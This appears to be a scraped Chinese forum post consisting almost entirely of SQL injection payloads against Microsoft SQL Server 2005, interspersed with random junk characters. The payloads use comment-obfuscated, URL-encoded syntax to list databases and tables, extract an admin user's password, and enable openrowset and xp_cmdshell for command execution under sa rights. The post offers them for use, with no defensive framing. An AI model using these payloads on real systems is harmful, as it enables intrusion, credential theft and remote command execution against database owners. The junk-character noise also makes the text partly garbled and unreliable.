# e9 m8 h, [ W$ {/ g* L4 k* G: u2 }
- S7 `; [! H' {3 K$ C[Copy to clipboard]CODE:
" g2 S6 i/ L$ _ {) g/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
/ t$ C- n1 ^" F& s; k- S1 {+ g9 m& @8 E! y
爆表语句,somedb部份是所要列的数据库,红色数字1累加
1 p8 ^3 d2 P9 n* A; Y
: m1 ^' P$ N& Q! K+ U( |( R: H" i; v* A& T ~/ v3 @
[Copy to clipboard]CODE:
* x8 y P7 E3 B ~' A' a/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--/ j1 T) ^) m' B: f6 v
% D+ k; Q# w$ o# N' b9 X
爆字段语句,爆表admin里user='icerover'的密码段
/ x) m- w$ V) M
1 V* ^3 y5 Q( M n- ^2 z* {8 f) X; D5 V; |+ F
[Copy to clipboard]CODE:8 Z; U1 R/ [1 E3 ~ g6 q. G
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
3 X3 |& P3 Y* f" ~
" q- Z# M1 ?1 N4 j- jmssql2005默认没有开xp_cmdshell的,openrowset也不能用
' W) S0 c4 j7 i: Q& Z如果是sa权限,可以这样来开启* {1 \# f: H( J0 F1 K# ^
开启openrowset4 l8 S$ c" s e" m X# }9 K' [
7 }2 c* Y6 e9 `% J [4 S2 G
( _' c9 @# U# E. w# |% l6 E[Copy to clipboard]CODE:
) i d: c$ `7 Q* l3 |/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--9 u( ~, t3 Z' c- A
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--3 @, i& h9 h; ~, d9 J6 u% Q! Q' n
. t* z/ w2 {" K* _) A! O
开启xp_cmdshell
/ E" e+ V9 n9 x( E7 J Z6 @0 L) {* x, ^$ F, f+ C$ P% i
/ C: P! I) \/ N [/ `- H[Copy to clipboard]CODE:
! r" i9 M) l! s5 r9 L; Q1 `/ SEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--; G9 W* _+ D7 y1 N; {
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
, H y( F) i: |7 A% e) X& K6 Z, u! R4 d9 A3 p0 V! W6 B1 R1 u) m
ok,over~~晚安
6 `/ R% l- X f3 D& y |